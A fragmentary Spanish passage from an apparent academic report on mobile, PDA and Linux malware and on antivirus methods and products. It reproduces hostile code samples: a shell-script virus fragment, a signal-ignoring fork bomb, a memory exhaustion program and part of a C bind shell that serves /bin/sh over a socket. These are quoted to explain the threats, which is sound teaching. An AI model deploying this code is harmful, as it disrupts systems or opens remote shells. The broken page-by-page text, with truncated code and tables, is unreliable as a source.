mensajería, agenda o navegación Web y las cambia por versiones que no
funcionan. Actúa cambiando los iconos de las distintas funciones por una calavera.
De este modo, el celular infectado deja de ser útil y queda trabajando para solo
efectuar y recibir llamadas telefónicas (Consumer, 2005)13.
Cabir: El organismo estatal red.es tiene a disposición del usuario una página de
alerta anti-virus donde se explica el modo de operar en caso de ataque por Cabir.
81
Tuukka Toivonen, jefe de cuentas empresariales de la operadora finlandesa Elisa,
comenta que "en el lado empresarial, la demanda está ya ahí. Los gerentes de
tecnologías de la información han comprendido el asunto. Pero para los
consumidores es todavía demasiado agresivo". (El PAIS, 2005)22.
"Algunos operadores han elegido buscar software antivirus para móviles y crear
nuevas empresas. La gran mayoría, sin embargo, están satisfechos
desplazándose más cautelosamente", comentó Aaron Davidson, consejero
delegado de Simworks, la empresa de antivirus con base en Nueva Zelanda. "A
pesar de la creencia popular, la mayoría de los operadores se mueven lentamente
y bajo mi punto de vista, el mero hecho de que estén interesados en evaluar las
soluciones es un gran paso adelante".
Para proveer mayor seguridad a los usurarios de telefonía móvil los celulares que
se vendan a finales del segundo semestre del 2006 podrían ser mucho más
seguros que los actuales, gracias a un nuevo estándar de seguridad cuya
especificación final está prevista para la primera mitad del año próximo
82
Según Roger Kay, miembro del consejo asesor de TCG, aunque todavía queda
mucho trabajo por delante antes de finalizar el estándar, “ya se han detallado las
áreas que cubrirá y el calendario para su desarrollo”. De acuerdo con los planes
de la asociación, se espera que la especificación esté públicamente disponible en
la primera mitad de 2006. Así, los primeros productos que soporten el nuevo
estándar de seguridad podrían aparecer en el mercado a finales de este año (El
PAIS, 2005)22.
Debido a que proveedores como Cingular mantienen un duro control en las redes,
los usuarios han evitado los Spam, el espionaje y otras molestias que afectan a
los usuarios de ordenadores. Pero esto no quiere decir que sean inmunes a otras
amenazas.
Laurie demostró que podía copiar los calendarios y las listas de contacto de 46
diputados británicos y convertir sus teléfonos en un perfecto dispositivo para
escuchar todas sus conversaciones. Laurie fue capaz de hacer uso de sus
teléfonos usando el Bluetooth, una tecnología inalámbrica de corto alcance
incluida en la mayoría de los nuevos teléfonos y que permite a los usuarios
distribuirse los unos a los otros la información de los contactos, hablar a través de
la radio del coche y conectarse con un ordenador sin necesidad de cables
(IBLNEWS, 2005)34.
83
"La nueva generación de teléfonos en realidad viene con un software mucho más
poderoso dentro del sistema operativo", declaró Dylan Andrew, el organizador del
encuentro. "Hemos encontrado nuevos ataques que afectan a éstas nuevas
plataformas y que permiten al atacante, por ejemplo, tomar el control del teléfono
celular en forma remota, quizás leer la agenda de direcciones o escuchar
secretamente un conversación”. (Noticiasdot, 2005)52.
Más que el temor ante la aparición de virus para celulares, los expertos están
preocupados por el surgimiento de prácticas de hackeo, conocidas como
BlueSnarfing y BlueSniping, las cuales aprovechan serias vulnerabilidades
encontradas en la tecnología Bluetooth para acceder y capturar la información
almacenada en los teléfonos celulares que cuentan con esta tecnología
inalámbrica.
Norman Bennett, gerente general de Symantec, expresa que “en la medida que
los dispositivos móviles se convierten cada vez más en una necesidad y aumenta
el número de usuarios, son mayores las oportunidades para Hackers y otro tipo de
conductas maliciosas. La lista ataques a dispositivos móviles crece rápidamente y
84
aunque aún no han tenido una propagación masiva, sí se han identificado varios
en sistemas operativos como Pocket PC y Symbian, junto con algunas
debilidades de la tecnología Bluetooth y es por esto que existe una preocupación
al respecto, tanto por parte de los fabricantes de los dispositivos como de las
empresas de seguridad”.
Respecto del inminente aumento en los ataques a celulares por parte de hackers,
Darío Bengoechea, Country Manager de Afina, señala que “para entender esto
hay que pensar que los celulares se constituyen en el blanco de los hackers, en la
medida en que se han ido masificando en todo el mundo e integrando nuevas
funcionalidades de las redes inalámbricas de voz y datos. Desde este punto de
vista, lo más probable es que en el futuro cercano sigamos viendo nuevos virus
que infecten a celulares, especialmente a aquellos que tengan funcionalidades
anexas de mensajería y conectividad vía Bluetooth, entre otras. No se trata de
una situación alarmante por ahora, pero que sí debe ser conocida por los
usuarios”.
85
Respecto de las recomendaciones o medidas preventivas que debieran tomar los
usuarios de móviles para evitar ser blanco de estos ataques, los expertos
coinciden en que los usuarios deben conocer las capacidades y aplicaciones de
los teléfonos que utilizan. Bengoechea, Country Manager de Afina, señala que “en
el caso de amenazas de virus, deben informarse sobre las condiciones y
cualidades técnicas de el celular, para saber si los modelos que se usan han sido
atacados por algún virus o similares. Segundo, en caso de estar dentro de los
probables modelos que sufran ataques, buscar la forma de desactivar las
funcionalidades que puedan facilitar el contagio en caso de encontrarse en un
probable foco de virus”.
7.2.5 Antivirus para los celulares. Empresas como F-Secure Mobile Anti-
Virus ya ofrecen al mercado de la telefonía celular protección contra contenido
malicioso, Ya que han aparecido los primeros virus y ya es posible crear código
malicioso que dañe el teléfono hasta el punto de impedirte utilizarlo. Un virus
puede causar una facturación falsa, divulgación de información almacenada,
borrado, modificado o datos corruptos las funciones principales del antivirus son:
86
7.2.6 Virus para celulares que afectan a PCs.
Los virus pueden ser una amenaza en Linux. Existen varios. Lo que es cierto es
que un virus en Linux no encontrará un lugar fructífero para propagarse. Primero
el código del virus se debe ejecutar en ella. Lo que significa que se ha copiado un
ejecutable corrupto desde otro sistema. En el mundo Linux, la práctica común es
el pasar una aplicación a otro usuario dándole la URL donde se encuentra el
software en lugar de enviar archivos ejecutables. Es decir, el virus viene de un sitio
oficial, donde se puede detectar rápidamente. Una vez que una máquina se ha
infectado, para conseguir extender el virus, este debería usarse como una
plataforma de distribución para aplicaciones precompiladas, lo que es muy
infrecuente. El hecho es que un fichero ejecutable no es un buen medio de
transporte para una virus en el mundo del software libre.
87
Si los virus han representado una alucinación en Unix por mucho tiempo, es
también debido a la diversidad de procesadores (y por tanto de los lenguajes
ensambladores) y de librerías (y de los objetos referenciados) lo que ha limitado el
rango de código precompilado. Hoy esto no es así, y los virus que infectaran los
ficheros ELF compilados para Linux en un procesador i386 con GlibC 2.1
encontrarían un montón de objetivos. Además un virus podría escribirse en un
lenguaje que no dependiera del host en el que se ejecutara. Por ejemplo, aquí
está un virus para scripts de shell.
#! /bin/sh
# infectado
( tmp_fic=/tmp/$$
candidatos=$(find . -type f -uid $UID -perm -0755)
88
cat $fic >> $tmp_fic
# Sobreescribimos el fichero original.
cat $tmp_fic > $fic
done
rm -f $tmp_fic
) 2>/dev/null &
La Tabla 2 (Virus en Linux) contiene información sobre los virus más conocidos
en Linux. Todos ellos infectan ficheros ejecutables ELF insertando su código
después de la cabecera del fichero y colocando detrás el resto del código original.
Diesel Ninguna
Usa un fichero temporal para ejecutar el programa
Kagob Ninguna
original infectado
Satyr Ninguna
Vit4096 Ninguna Sólo infecta los ficheros en el directorio actual.
89
Como se observa el virus "Winux" es capaz de propagarse tanto en Linux como
en Windows. Es un virus inofensivo y es más una prueba de posibilidades que un
peligro real. Pero este concepto produce alteraciones, al pensar que un intruso
podría saltar de una partición a otra, invadir una red heterogénea usando
servidores Samba, etc. La erradicación sería difícil ya que las herramientas
requeridas deberían estar disponibles para ambos sistemas a la vez. Es
importante tener en cuenta que el mecanismo de protección de Linux que impide
a los virus que trabajan bajo la identidad de un usuario normal corromper los
sistemas de ficheros, ya no está disponible si se accede a la partición desde un
virus funcionando en Windows.
Esto no está todavía muy extendido, y se puede apostar que los virus que ataquen
particiones desmontadas pronto representarán un significativo peligro para
máquinas Linux (Blaess, 2005)8.
7.3.1 Bombas Lógicas. Los daños que puede causar una bomba lógica cuando
se ejecuta en un sistema Linux. Puede variar dependiendo del efecto buscado por
el atacante y de los privilegios del usuario. En lo que concierne a la destrucción de
archivos del sistema o a la lectura de datos confidenciales, se tienen dos casos.
90
Si se ejecuta bajo cualquier otra identidad, no será más destructiva que lo que
puede ser cualquier usuario sin privilegios por sí mismo. Sólo podrá destruir los
datos pertenecientes a ese usuario. Es este caso, se debe hacer cargo de sus
propios archivos. Un administrador de sistema cuidadoso hará muy pocas tareas
cuando acceda como root, lo que reduce la probabilidad de lanzar una bomba
lógica bajo esta cuenta.
#include <signal.h>
#include <unistd.h>
int
main (void)
{
int i;
for (i = 0; i < NSIG; i ++)
signal (i, SIG_IGN);
while (1)
fork ();
}
Los límites que se pueden llegar a establecer para los usuarios (con la llamada de
sistema setrlimit() y la función de shell ulimit() permiten acortar la vida de este
tipo de programas, pero sólo actúan tras un tiempo en el que el sistema no está
disponible. En este mismo orden, un programa como el siguiente utiliza toda la
memoria disponible y entra en un bucle "disipando" los ciclos de CPU, perturbando
el funcionamiento de los otros procesos.
#include <stdlib.h>
#define LG 1024
int
main (void) {
char * buffer;
while ((buffer = malloc (LG)) != NULL)
memset (buffer, 0, LG);
while (1)
;
}
91
Habitualmente este programa es aniquilado automáticamente por el mecanismo
de gestión de memoria virtual en las últimas versiones del núcleo. Pero antes de
esto, el núcleo puede matar otras tareas que requieran un montón de memoria y
luego estén inactivas (como aplicaciones X11, por ejemplo).
7.3.2 Caballos de Troya. En el mundo del software libre, desde el autor de una
pieza de código hasta el usuario final sólo hay uno o dos intermediarios (digamos
alguien encargado del proyecto y alguien dedicado a la distribución). Si se
descubre un troyano es fácil encontrar al "culpable". En el mundo del software
libre está por lo tanto bastante bien protegido contra los troyanos. Pero se habla
del software libre como lo conocemos hoy en día, con proyectos claramente
gestionados, programadores disponibles y sitios web de referencia. Esto está
bastante lejos del shareware o el Freeware, sólo disponibles precompilados,
distribuidos de forma anárquica por cientos de sitios web (o entregados en CD
junto a revistas), donde el autor sólo es conocido por una dirección de correo fácil
de falsificar; esto hace un verdadero de grupo de caballos de Troya.
Se debe tener en cuenta que el hecho de tener el código fuente de una aplicación
y compilarla no es garantía de seguridad. Por ejemplo una bomba lógica dañina
puede estar escondida en el script "configure" (el que se llama durante
"./configure; make") que habitualmente ¡ocupa unas 2000 líneas! Por último, pero
no menos importante, si el código fuente de una aplicación está limpio y compila;
esto no impide al Makefile esconder una bomba lógica, activándose durante el
"make install" final, ¡que suele ejecutarse como root!.
Por último, una importante parte de los virus y Troyanos dañinos en Windows,
son macros ejecutadas cuando se consulta un documento. Los paquetes
ofimáticos en Linux no pueden interpretar esas macros, al menos por ahora, y el
usuario rápidamente tiene un exagerado sentimiento de seguridad. Puede llegar la
ocasión en que esas herramientas sean capaces de ejecutar las macros Basic
incluidas en el documento. El hecho de que los diseñadores dejen a estas macros
ejecutar comandos en el sistema podrá ocurrir antes o después.
92
En este caso Los virus, y el efecto devastador estará limitado a los usuarios
privilegiados, pero el hecho de no perder los archivos del sistema (disponibles en
el CD de instalación, de todas formas), es un pequeñísimo consuelo para el
usuario doméstico que acaba de perder todos sus documentos, sus códigos
fuente, etc..., mientras su última copia de seguridad es de hace un mes. Existe
siempre una forma de molestar al usuario, incluso sin hacer daño, a algunos
archivos que requieren una interpretación. En Usenet, se puede ver, de vez en
cuando, archivos comprimidos multiplicándose estos a sí mismos en un puñado de
archivos hasta llegar a saturar el disco. Algunos archivos Postscript también
pueden bloquear el intérprete (ghostscript o gv) despilfarrando tiempo de CPU.
No hay daños, sin embargo hacen al usuario perder tiempo y causarle molestias
(Blaess, 2005)8.
La Tabla 3(Gusanos en Linux) presenta algunos, entre los que están los más
extendidos estos gusanos explotan vulnerabilidades de servidores de red. Para las
estaciones de trabajo ocasionalmente conectadas a Internet el riesgo es
teóricamente menor que para los servidores permanentemente conectados. Sin
embargo, la evolución de las formas de conexión proporcionadas a los usuarios
domésticos (cable, SDL, etc) y la actual facilidad de implementación de los
servicios de red (servidores HTTP, FTP anónimo, etc) implica que rápidamente
estos pueden llegar a afectar a todos.
93
Sobre los gusanos, se tiene en cuenta que su crecimiento es por un tiempo
limitado. Sólo "sobreviven" replicándose de un sistema a otro, y ya que cuentan
con las últimas vulnerabilidades descubiertas, la rápida actualización de las
aplicaciones objetivo paran su propagación. En un futuro cercano, posiblemente
los sistemas domésticos tendrán que consultar automáticamente sitios web de
referencia (a diario) que tendrán que ser de confianza para encontrar esos
parches de seguridad para las aplicaciones del sistema. Podría volverse necesario
para impedir al usuario que trabaje todo el tiempo como administrador del sistema
mientras que le permite beneficiarse de aplicaciones desarrolladas en red (Blaess,
2005)8.
int
main (void)
{
int sock;
int sockopt;
struct sockaddr_in adresse; /* dirección */
94
socklen_t longueur; /* longitud */
int sock2;
int pty_maitre; /* pty_maestro */
int pty_esclave; /* pty_esclavo */
char * nom_pty; /* nombre_pty */
struct termios termios;
char * args [2] = { "/bin/sh", NULL };
fd_set set;
char buffer [4096];
int n;
95
execv (args [0], args);
exit (1);
}
/* Padre: copia del socket al pseudo-TTY maestro
y viceversa */
tcgetattr (pty_maitre, & termios);
cfmakeraw (& termios);
tcsetattr (pty_maitre, TCSANOW, & termios);
while (1) {
FD_ZERO (& set);
FD_SET (sock2, & set);
FD_SET (pty_maitre, & set);
if (select (pty_maitre < sock2 ? sock2+1: pty_maitre+1,
& set, NULL, NULL, NULL) < 0)
break;
if (FD_ISSET (sock2, &set)) {
if ((n = read (sock2, buffer, 4096)) < 0)
break;
write (pty_maitre, buffer, n);
}
if (FD_ISSET (pty_maitre, &set)) {
if ((n = read (pty_maitre, buffer, 4096)) < 0)
break;
write (sock2, buffer, n);
}
}
return (0);
}
96
Un caso típico es el de los sistemas de encriptación. Por ejemplo, el sistema SE-
Linux, en funcionamiento, es una versión Linux donde la seguridad ha sido
reforzada con parches suministrados por la NSA. Los desarrolladores de Linux
que habían comprobado los parches suministrados dijeron que nada parecía
sospechoso, pero nadie puede estar seguro y muy pocos tienen los conocimientos
matemáticos suficientes para descubrir tales vulnerabilidades (Blaess, 2005)8.
La mayoría de las PDAs operan con el sistema operativo PalmOS (diseñado por
Palm), por ello, se puede decir que Palm tiene un mercado similar al de Microsoft
en el campo de los sistemas operativos para computadoras personales. Aunque,
esto no libra de peligro a los demás sistemas operativos que sean admisibles en
este entorno.Los equipos Palm son ya acariciados como un preclaro blanco u
objetivo sumamente tentador para los más diversos programadores de virus.
Cuando el número de estos aparatos de mano llegue al grado en que las
computadoras han penetrado en el mercado mundial, el riesgo de que proliferen
los virus o Troyanos para ellas bien podrá alcanzar un rango de importancia.
97
pero esta situación ha ido cambiando desde que estos dispositivos han ingresado
a las redes informáticas. Palm no utiliza un sistema convencional de
almacenamiento de datos. Por el contrario, está diseñado para que pueda trabajar
óptimamente con un equipo de cómputo pese a su limitada capacidad. En un
Palm, los datos son guardados en bloques llamados registros. Estos, al
relacionarse entre sí se agrupan en bases de datos que, por ejemplo, representan
cosas como los datos inscritos en la agenda.
Dado que un usuario también debe regularmente guardar sus datos de respaldo
de manera tal que si la información que está en la Palm se perdiese, ella pueda
ser restaurada de manera rápida y fácil, es como nace la necesidad de antivirus
para estos dispositivos (aunque de momento la demanda no sea tan alta) y poder
cerrar así el círculo de seguridad idónea. Dependiendo de las características del
virus que ataque a las PDAs, estos tendrán más o menos capacidad de
propagación.
En el caso de los sistemas PALM ya está comprobado que pueden crearse virus
pero, al igual que ocurre en los Pocket PC, estos virus pueden eliminarse
simplemente desconectando la batería (Moreno, 2005)46.
En el hipotético caso de que un virus que fuera capaz de modificar esa ROM,
debería propagarse desde el PC de escritorio como, por ejemplo, un típico gusano
de correo electrónico. Si esto ocurriera, el antivirus tradicional instalado en el
ordenador con el que se está sincronizando la información detectaría la amenaza
y la eliminaría.
98
Si un virus consiguiera entrar en uno de los dispositivos de los que estamos
hablando, su propagación a otros sistemas sería realmente difícil. Todo depende
de cómo esté conectado el sistema con su entorno, dándose los posibles casos en
función de las conexiones de las que disponga:
- Virus de macro. Pocket PC incluye entre sus herramientas por defecto una
versión de Word llamada “Pocket Word” y otra de Excel llamada “Pocket Excel”.
La transferencia de información entre una y otra elimina las posibles macros que
hubiera en los documentos. Únicamente se respetan las macros realizadas con
99
Excel 4.0 y almacenadas en la misma hoja de cálculo, pero no se convierten las
funciones Auto_Deactivate, Auto_Activate, Auto_Close y Auto_Open, que son las
que pueden encerrar peligro en Excel 4.0.
Ante este panorama, podemos pensar que los virus en este tipo de dispositivos se
encuentran aún en una fase realmente inicial, sin que hasta ahora se hayan dado
casos reales de infecciones víricas (Panda Software, 2005)56.
Con este inconveniente, denominado gateway WAP, los datos HTML deben ser
descifrados y recodificados como WML (Wireless Markup Language), ya que
estos van desde la codificación SSL (Secure Sockets Layer), que soporta HTML,
hasta la codificación WTLS (Wireless Transport Level Security), que soporta
WML.
Por ejemplo, el kit de herramientas Bsafe de RSA para una codificación WTLS,
utiliza tecnología multiprime, que sacrifica la seguridad en función del tamaño y el
rendimiento. Por tanto, a pesar de que los vendedores aseguren las
100
transacciones, los dispositivos no son tan seguros. Esta falta de seguridad
convierte a los dispositivos inalámbricos y teléfonos móviles en el blanco de los
hackers, que intentarán desarrollar nuevos virus para las redes públicas.
El antivirus para PDA cuenta con análisis en busca de virus a petición del usuario
y un mantenimiento sencillo con actualizaciones a través de Internet. El director
General de Trend Micro en España, Mario Velarde, explicó que para instalar la
aplicación de seguridad, el usuario debe descargar el programa al computador y
luego sincronizarlo con la PDA.
101
Kaspersky Security para PDAs es una solución de dos niveles que protege los
datos en las computadoras de bolsillo. El programa lo protege contra código
malicioso y previene el acceso no autorizado a la información. Las opciones de
seguridad adicional realzan un conjunto de funcionalidades estándar.
Para PDAs con sistemas Palm, el programa monitorea todos los flujos de datos
que actúan como vectores de infección: escaneo on-demand de archivos, tanto
memoria RAM como de tarjetas de memoria, protegiendo así los datos
transferidos mediante HotSync y Beam.
Para los dispositivos PalmOS, tales como Palm Pilots y Handspring Visors, el
VirusScan Wireless ofrece exploración en el mismo dispositivo. Con la
exploración en el dispositivo, VirusScan Wireless proteger la PDA contra
infecciones incluso cuando se transfieren ficheros por infrarrojos o cuando se
conecta a la red de modo inalámbrico. VirusScan Wireless es una de las
soluciones que se ofrecen a para los equipos Palm en protección tanto en el
dispositivo como al sincronizar (Mcafeeb2b, 2005)40.
102
8. TEORÍA DE ANTIVIRUS
La técnica de scanning fue bastante eficaz en los primeros tiempos de los virus
informáticos, cuando había pocos y su producción era pequeña. Este
relativamente pequeño volumen de virus informáticos permitía que los
desarrolladores de antivirus de scanning tuvieran tiempo de analizar el virus,
extraer el fragmento de código usado para la identificación y agregarlo a la base
de datos del programa para lanzar una nueva versión. Sin embargo, la
obsolescencia de este mecanismo de identificación como una solución antivirus
completa se encontró en su mismo modelo.
La primera debilidad de este sistema radica en que siempre brinda una solución a
posteriori: es necesario que un virus informático alcance un grado de dispersión
considerable para que sea enviado (por usuarios capacitados, especialistas o
distribuidores del producto) a los desarrolladores de antivirus. Estos lo analizarán,
extraerán el fragmento de código necesario, y lo incluirán en la próxima versión de
103
su programa antivirus. Este proceso puede tomar meses a partir del momento en
que el virus comienza a tener una dispersión considerable, tiempo en el que puede
causar graves daños sin que pueda ser identificado.
104
8.2 ESTRUCTURA DEL PROGRAMA ANTIVIRUS
En este módulo también se realiza la identificación del virus, para lo cual existen
varias técnicas como el scanning y los algoritmos heurísticos.
8.2.2 Módulo de respuesta. El antivirus reacciona con una alarma que consiste
en un aviso en la pantalla ante la presencia de un programa “sospechoso”. La
función reparar se utiliza como solución temporal para mantener el sistema
funcionando hasta implementar una solución más adecuada. Existen dos técnicas
para evitar la infección de ejecutables, la primera es evitar que se infecte todo el
programa y la segunda es limitar la infección a determinado ámbito. Los
problemas de implementación de la primera técnica evitan que sea una buena
opción a pesar de lo conveniente de su implementación.
105
La primera debilidad de este sistema radica en que al detectarse un nuevo virus,
este debe aislarse por el usuario y enviarse al fabricante de antivirus, la solución
siempre será a posteriori: es necesario que un virus informático se disperse
considerablemente para que se envíe a los fabricantes de antivirus. Estos lo
analizarán, extraerán el trozo de código que lo identifica y lo incluirán en la
próxima versión de su programa antivirus. Este proceso puede demorar meses a
partir del momento en que el virus comienza a tener una gran dispersión, lapso en
el que puede causar graves daños sin que pueda identificarse.
En esta técnica, se guarda, para cada directorio, un archivo con los CRC de cada
archivo y se comprueba periódicamente o al ejecutar cada programa. Los
programas de comprobación de suma, sin embargo, sólo pueden detectar una
infección después de que se produzca. Además, los virus más modernos, para
ocultarse, buscan los ficheros que generan los programas antivirus con estos
cálculos de tamaño. Una vez encontrados, los borran o modifican su información
(Montesino, 2003)44.
106
Cuando analizamos las primeras instrucciones de cualquier archivo, veremos
instrucciones para detectar los parámetros de la línea de comandos, borrar la
pantalla, llamar a alguna función, ejecutar alguna macro, etc.. No obstante
tratándose de un virus suelen ser otras bien diferentes como activar el cuerpo del
virus o buscar más archivos para intentar implantarles su código.
La experiencia es sin duda lo que lleva a una persona a reconocer algo infectado
de algo limpio en cuestión de segundos. Esa “experiencia” se ha pretendido
introducir en los programas antivirus bajo el nombre de “heurística”.
El funcionamiento de la heurística es sencillo, primero se analiza cada programa
sospechoso sin ejecutar las instrucciones, lo que hace es desensamblar o
"descompilar" el código de máquina para deducir que haría el programa si se
ejecutara. Avisando que el programa tiene instrucciones para hacer algo que es
raro en un programa normal, pero que es común en un virus.
Sin duda el principal problema de las técnicas heurísticas ha sido los falsos
positivos. A pesar de que se han mejorado mucho en los últimos años, siguen sin
conseguir demasiada efectividad (aunque hay algunas excepciones). El problema
más que en la calidad de la rutina heurística está en la interpretación que el
usuario realice de ese aviso heurístico. Si es poco experimentado estará
constantemente mandando muestras a su casa de antivirus ya que “el antivirus le
dijo que podía tener un virus”.
Esta técnica permite "barrer" diferentes tipos de códigos dentro de los archivos,
que sean susceptibles de ser malignos. Códigos que son genéricos dentro de los
archivos maliciosos y que siempre suelen ser parecidos. O por lo menos respetar
parte de las cadenas de comandos que activan los virus.
Pero ¿cómo opera un antivirus? Los virus tienen patrones de códigos que son
como sus "huellas digitales". Los software antivirus buscan estos patrones, pero
sólo de los que tienen almacenados en su lista (por esto la actualización es tan
importante). Estos productos también pueden valerse de la heurística, es decir,
analizan los archivos para detectar comportamientos similares a los de los virus.
107
El método Heurístico es una tecnología de programación que dentro de sus rutinas
de detección de especies virales, incluye las cadenas clásicas que son similares,
parecidas o afines a virus auténticos. El método heurístico, si no está bien
programado, es susceptible de incurrir en resultados falsos positivos o negativos.
Además, al encontrar un virus desconocido, variante de otro existente, el antivirus
que emplea este método de búsqueda no podrá eliminar eficientemente el virus y
mucho menos reparar el archivo o área afectada.
Para que un antivirus detecte y elimine eficientemente a un virus así como también
repare los daños ocasionados, debe incluir en la base de datos de sus rutinas de
detección y eliminación el exacto micro código viral de esa especie. Sin embargo
la técnica de búsqueda heurística de virus por "familias" es una forma eficiente de
detectar a especies virales que pertenecen a una misma familia, aunque no es un
método absolutamente exacto o eficiente.
(Pérez, 2005)58.
No se puede afirmar que exista un solo sistema antivirus que presente todas las
características necesarias para la protección total de las computadoras; algunos
fallan en unos aspectos, otros tienen determinados problemas o carecen de
ciertas facilidades. De acuerdo con los diferentes autores consultados, las
características esenciales son las siguientes:
108
Gran capacidad de desinfección.
Presencia de distintos métodos de detección y análisis.
Chequeo del arranque y posibles cambios en el registro de las aplicaciones.
Creación de discos de emergencia o de rescate.
Disposición de un equipo de soporte técnico capaz de responder en un tiempo
mínimo (ejemplo 48 horas) para orientar al usuario en caso de infección.
109
Para ser certificados por la ICSA, los productos deben detectar el 100% de estos
virus, usando la versión de The Wildlist que haya sido lanzada un mes antes de la
fecha de la prueba. Adicionalmente un criterio de “Infecciones Comunes” asegura
que cualquier virus que la ICSA considere importante se debe tratar en la forma en
que la ICSA considera apropiada. El test de falsas alarmas fue adicionado en
1999.
El nivel uno mide la habilidad del producto evaluado para detectar todos los virus
en The Wild, usando muestras basadas en la edición de la WildList de no menos
de dos meses antes del lanzamiento del producto.
En el nivel dos los productos también tienen que desinfectar esos virus. Además
las pruebas de nivel dos usan la versión de la WildList que haya sido publicada
un mes antes del lanzamiento del producto.
Ambas pruebas son llevadas a cabo usando virus replicados por West Coast,
midiendo asi la habilidad de los productos para detectar virus que constituyen la
amenaza real. Muchos productos populares son sometidos a este esquema de
prueba. Los productos certificados son anunciados regularmente.
110
De acuerdo a Marx, la mayoría de los criterios de prueba han sido escogidos por
administradores de redes, usuarios, revistas, Compañías AV y la Universidad.
Estos criterios incluyen detección de virus en The Wild, y desinfección. Los
resultados son publicados en inglés y en alemán.
111
8.5 VALORACIÓN DE DIFERENTES CLASES DE SOFTWARE ANTIVIRUS
112
Tal vez, demora algo más en completar el proceso de análisis, pero detectó el 100
% de los virus utilizados, con un porcentaje muy bajo de falsos positivos
(Contreras, 2005)14.
8.5.2 McAFEE VIRUS SCAN. Es uno de los más famosos. Trabaja por el
sistema de escaneo descrito anteriormente, y es el mejor en su estilo. Para
escanear, hace uso de dos técnicas propias: CMS (Code Matrix Scanning,
Escaneo de Matriz de Código) y CTS (Code Trace Scanning, Escaneo de
Seguimiento de Código) (Manson, 2003)39.
McAfee VirusScan es uno de los clásicos entre los productos antivirus y suele
ocupar siempre los puestos punteros en sus estudios. La compañía Network
Associates adquirió McAfee y el doctor Solomons integró este producto con
113
nuevas tecnologías para analizar los protocolos de Internet, de forma que el
módulo VShield permite analizar el tráfico con los navegadores Netscape
Navigator e Internet Explorer, así como con los clientes de Outlook Express,
Eudora, Netscape Mail, Microsoft Exchange, Outlook y Lotus cc:Mail
(Hispasec,2001)33.
VirusScan se presenta actualmente con una nueva interfaz algo más futurista,
con una imagen que huye de las típicas aplicaciones Windows, donde, sin
embargo falta la extrema sencillez y claridad de la anterior interfaz minimalista,
basada en pestañas. En lo que a opciones se refiere, además del menú de
exploración, se encuentra un planificador de tareas y una sección de cuarentena
que permite aislar los archivos infectados y sospechosos y enviarlos de forma
automática a los laboratorios AVERT para su análisis.
En su nueva versión ofrece una interfaz nada convencional; sin embargo, incluye
los controles en el menú del botón derecho del ratón, para seleccionar los ficheros
que se desean revisar. También mantiene dos iconos pequeños en la esquina
derecha de la barra de tareas. La interfaz de usuario no se ajusta a los estándares
actuales de ventanas, produce cierta confusión en su uso.
Los resultados de las pruebas no fueron muy buenos. Fue capaz de detectar el 94
% de los virus y sólo presentó un 3 % de falsos positivos. En los virus del tipo
macro, la desinfección fue muy satisfactoria, al conservarse las macros operativas.
El factor más desfavorable en su evaluación fue en la detección en correo. En
algunos casos, cuando se adjuntó un fichero infectado con virus a un mensaje, el
programa lo detectó hasta que se guardó en el disco.
114
La documentación sobre los virus no se encuentra en el CD, sino que es necesario
estar conectado a Internet para poder acceder a ella. Esto supone un problema
para cualquier usuario de un equipo que no esté conectado a Internet. Por otra
parte, McAfee ofrece un servicio de desinfección para nuevos virus, también a
partir de una conexión a Internet. Puede enviarse un fichero en formato
comprimido y McAfee se compromete a limpiarlo y devolverlo en cuestión de
horas desde los laboratorios AVERT Labs. Mientras tanto, puede colocarse en
cuarentena, para evitar su difusión a otros equipos.
Las actualizaciones del escáner y del fichero de patrones se hacen también por
Internet. Se puede configurar la interfaz para arrancar una actualización al hacer
clic con el botón derecho del ratón. Las actualizaciones pueden hacerse de por
vida. El resto de los servicios son de carácter indefinido. Es el programa más
económico de la esta comparación (Montesino, 2005)44.
8.5.3 Sophos. Con centro en Reino Unido, es uno de los fabricantes de antivirus
que más se destaca por su especialización en entornos corporativos y por la
cantidad de plataformas que soporta. Junto con el software, el usuario adquiere el
servicio de actualizaciones periódicas, alertas y emergencias técnicas vía correo
electrónico y soporte por teléfono e Internet. Nada más activar Sophos, se accede
a una sencilla interfaz. Mediante tres pestañas, puede accederse a la exploración
inmediata, a la agenda para planificar tareas y, por último, a la configuración de
InterCheck, el módulo residente. En la barra de herramientas, pueden iniciarse las
exploraciones o detenerlas, entrar en el apartado de configuración, alarmas y
diccionario de virus. Incluye una relación de todos los virus detectados, con sus
propiedades.
Si bien este software ofrece un nivel de soporte alto, se trata sin duda del peor
producto antivirus de los evaluados en el aspecto técnico. Además de ser uno de
los productos que obtiene los índices más bajos de detección, es el único que no
es capaz de desinfectar ejecutables, una opción que hoy por hoy no se concibe en
antivirus profesionales. En su lugar, este antivirus recomienda que se eliminen los
ficheros afectados y que se reemplace por una copia limpia (Hispasec, 2005)33.
115
La principal ventaja de Sophos es su capacidad para trabajar en distintos
entornos, como Lotus Notes, Exchange, Novell, etc. Esto lo convierte en una
seria opción para sistemas hetereogéneos.
116
Existen otros programas, como Smart Behavior Blocker, cuya misión es la de
analizar el comportamiento de algún programa posiblemente infectado.
Este programa debería integrarse en la interfaz principal, para que el usuario no se
vea obligado a averiguar para qué sirve y cómo tiene que utilizarlo.
8.5.5 Panda Platinum. Panda Software, muy popular en España, lucha fuerte
por imponerse a nivel internacional con un producto avanzado y una nueva
concepción de servicios añadidos. Con la adquisición de su producto, el usuario
obtiene durante un año soporte telefónico 24 horas x 365 días, servicio de
desinfección de virus nuevos en 24 horas, actualizaciones diarias del fichero de
firmas, así como del software de la aplicación.
A primera vista, Panda Platinum conserva la misma interfaz que se destaca por
ser similar en su concepción a la de Outlook, sus componentes multimedia, y su
integración en los clientes de correo. Uno de los cambios más significativos
experimentados por ella no se puede observar a simple vista, y se encuentra en
un renovado interior para integrarse de lleno con las nuevas especificaciones de
Windows.
117
Panda es posiblemente el programa antivirus de mayor difusión en España, hecho
perfectamente lógico, si se considera que es una empresa española, con una
estructura comercial grande y con un servicio técnico en español (Contreras,
2005)14.
Llama la atención la presentación del producto, con más manuales muy bien
editados y con mucha más información que el resto. Así, el usuario no depende
tanto de una conexión a Internet para obtener ayuda, que por cierto es muy
extensa y clara y, además, en el mismo paquete incluye una breve documentación
de todos los virus que se conocen.
Panda también comercializa otros productos relacionados con Platinum 6.0, como
el Seguro Antivirus Global, para Exchange, Lotus Notes, Firewall y proxy.
118
La interfaz de F-Secure se mantiene con respecto a años anteriores, basada en
tareas predefinidas y en la posibilidad de añadir o editar nuevos trabajos de
análisis, ello permite una distribución y gestión centralizada, especialmente útil
para redes corporativas.
Una vez más, como es habitual, F-Secure obtuvo los mayores resultados en las
